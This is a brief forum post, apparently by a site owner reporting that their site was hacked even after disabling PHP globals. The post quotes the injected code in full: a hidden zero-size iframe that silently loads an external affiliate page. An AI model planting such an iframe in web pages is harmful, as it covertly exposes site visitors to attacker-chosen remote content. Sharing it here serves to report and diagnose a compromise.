I turned off the globals, as per code given a week ago or so.
Got hacked day before yesterday
[]<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=soauker marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>[/]
Makes me wonder if they got our domain address by coming here...